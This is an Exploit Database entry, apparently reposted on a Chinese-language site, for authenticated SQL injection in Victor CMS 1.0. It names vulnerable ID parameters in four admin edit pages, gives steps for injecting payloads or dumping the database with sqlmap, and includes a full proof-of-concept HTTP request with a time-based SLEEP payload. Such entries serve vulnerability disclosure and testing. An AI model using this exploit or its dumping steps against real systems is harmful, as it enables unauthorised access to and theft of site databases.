Victor CMS 1.0 – Multiple SQL Injection (Authenticated)

• Exploit Database
• 35 阅读

• 作者： Furkan Göksel
  日期： 2020-12-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49282/

• # Exploit Title: Victor CMS 1.0 - Multiple SQL Injection (Authenticated)
  # Date: 17.12.2020
  # Exploit Author: Furkan Göksel
  # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
  # Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
  # Version: 1.0
  # Description: The Victor CMS v1.0 application is vulnerable to SQL
  # injection in c_id parameter of admin_edit_comment.php, p_id parameter
  # of admin_edit_post.php, u_id parameter of admin_edit_user.php, edit
  # parameter of admin_update_categories.php.
  
  # Tested on: Apache2/Linux
  
  Step 1: Register the system through main page and login your account
  
  Step 2: After successful login, select one of the specified tabs
  (post, categories, comments, users)
  
  Step 3: When you click edit button of these records, an HTTP request
  is sent to server to get details of this record with corresponding
  parameters (eg. for edit comment it is c_id parameter)
  
  Step 4: Inject your SQL payload to these ids or use sqlmap to dump
  
  Example PoC request is as follows:
  
  GET /cve/admin/comment.php?source=edit_comment&c_id=2%20AND%20SLEEP(10) HTTP/1.1
  
  Host: 127.0.0.1
  User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0)
  Gecko/20100101 Firefox/83.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Connection: close
  Cookie: PHPSESSID=st8hhobgplut500p3lpug8qa66
  Upgrade-Insecure-Requests: 1
  
  Same PoC payload is valid for all edit features of specified tabs.